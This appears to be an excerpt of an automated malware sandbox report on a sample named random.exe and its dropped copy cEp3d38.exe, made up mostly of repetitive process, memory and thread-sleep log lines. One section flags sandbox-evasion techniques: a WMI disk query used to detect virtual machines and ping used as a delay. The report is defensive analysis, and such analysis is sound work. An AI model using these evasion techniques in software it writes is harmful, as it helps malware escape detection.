                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Uses ping.exe to sleep
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 4000Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeMemory allocated: 1510000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\random.exeMemory allocated: 3090000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\random.exeMemory allocated: 16B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\random.exeMemory allocated: 1160000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\random.exeMemory allocated: 2EA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\random.exeMemory allocated: 12D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\random.exeMemory allocated: A40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\random.exeMemory allocated: 2360000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\random.exeMemory allocated: 4360000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\random.exeMemory allocated: B30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\random.exeMemory allocated: 2680000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\random.exeMemory allocated: CA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeMemory allocated: 7F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeMemory allocated: 2430000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeMemory allocated: 2380000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeWindow / User API: threadDelayed 2543Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeWindow / User API: threadDelayed 7261Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeWindow / User API: threadDelayed 2271Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeWindow / User API: threadDelayed 7543Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeWindow / User API: threadDelayed 4906Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeWindow / User API: threadDelayed 4902Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeWindow / User API: threadDelayed 1646Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeWindow / User API: threadDelayed 431Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeWindow / User API: threadDelayed 1454Jump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -39830s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -39705s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -39580s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -39455s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -39330s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -39205s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -39080s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -38955s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -38829s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -38705s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -38580s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -38455s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -38330s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -38165s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -37911s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -37798s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -37673s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -37549s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -37423s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -37298s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -37173s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -37048s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -36923s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -36798s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -36673s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -36548s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -36423s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -36298s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -36173s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -36048s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -35923s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -35799s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -35673s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -35548s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -35376s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -35252s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -35080s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -34935s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -34830s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -34705s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -34580s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -34455s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -34330s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -34205s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -34080s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -33955s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -33830s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -33705s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -33580s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -33455s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -33330s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 3920Thread sleep time: -33205s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -39830s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -39705s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -39580s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -39455s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -39330s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -39205s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -39080s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -38955s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -38814s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -38689s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -38564s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -38439s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -38314s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -38189s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -38064s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -37939s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -37802s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -37674s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -37549s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -37424s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -37299s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -37174s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -37049s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -36924s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -36799s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -36674s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -36549s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -36424s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -36299s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -36174s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -35297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -35174s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -35049s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -34924s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -34799s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -34674s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -34548s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -34424s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -34299s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -34174s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -34049s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -33924s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -33799s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -33674s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -33549s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -33424s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -33299s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -32406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -32298s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 1820Thread sleep time: -32174s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -39830s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -39689s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -39340s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -39196s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -39066s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -38939s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -38814s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -38689s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -38564s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -38439s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -38314s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -38189s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -38064s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -37939s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -37814s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -37689s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -37564s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -37439s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -37314s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -37189s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -37064s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -36939s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -36814s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -36689s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -36568s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -36439s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -36314s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -36189s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -36064s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -35939s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -35814s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -35689s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -35564s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -35439s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -35314s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -35189s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -35064s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -34939s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -34814s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -34689s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -34564s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -34439s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -34314s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -34189s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -34064s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -33939s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -33814s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -33657s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -33544s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -33435s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 4680Thread sleep time: -33324s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -39830s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 6600Thread sleep count: 1646 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 6600Thread sleep count: 431 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -39703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -39578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -39469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -39346s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -39221s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -39096s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -38920s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -38721s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -38451s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -38345s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -38221s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exe TID: 5244Thread sleep time: -38096s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -39830s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -39690s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1144Thread sleep count: 1454 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1144Thread sleep count: 227 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -39565s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -39449s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -39323s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -39098s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -38979s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -38860s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -38608s >= -30000sJump to behavior
